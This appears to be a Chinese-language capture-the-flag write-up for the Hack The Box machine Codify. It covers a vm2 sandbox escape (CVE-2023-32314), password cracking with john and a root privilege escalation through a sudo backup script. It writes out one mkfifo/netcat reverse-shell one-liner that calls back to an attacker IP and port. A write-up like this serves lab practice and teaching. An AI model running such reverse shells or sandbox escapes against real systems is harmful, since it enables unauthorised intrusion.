Skip to content

Latest commit

 

History

History
88 lines (44 loc) · 2.47 KB

README.md

File metadata and controls

88 lines (44 loc) · 2.47 KB

先把codify.htb加入/etc/hosts

image

用nmap掃了後有開啟22,80跟3000 port

image

透過主頁的介紹大致知道他是可以線上測試node.js的網站

image

關於這邊有寫到她是用vm2的library

image

點開後他是使用3.9.16版本 去找有沒有相關漏洞

image

找到一個可以ByPass sandbox的漏洞 CVE-2023-32314

image

貼上她的payload後嘗試whoami 指令有成功讀取到 所以可以來嘗試看看reverse shell

image

在本地開啟一個8888 port監聽

image

在payload裡用上rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.23 8888 >/tmp/f 後成功get shell(不能用bin/bash 不確定是不是因為沒開/dev/tcp的關係)

image

裏頭有一個joshua 可是沒有權限進入 所以感覺是要去找他的ssh密碼

image

可是裡面資料夾有點多 翻不太到想要的東西 想說用linpeas看看

image

但不知道為什麼不能解析 github .com

image

最後是在var/www/contact這個路徑下找到一個tickets.db

image

其中這段看起來就很像是joshua的ssh密碼

image

拿去用john爆破成功爆出一段密碼 spongebob1

image

成功透過ssh登入了joshua身分

image

拿到user flag

image

用sudo -l 後發現有一個root權限下也可以運作的檔案 /opt/scripts/mysql-backup.sh

image

裏頭的程式碼

image

寫一個python 腳本來跑出密碼

image

成功爆出密碼

image

拿來登入root 並成功得到flag

image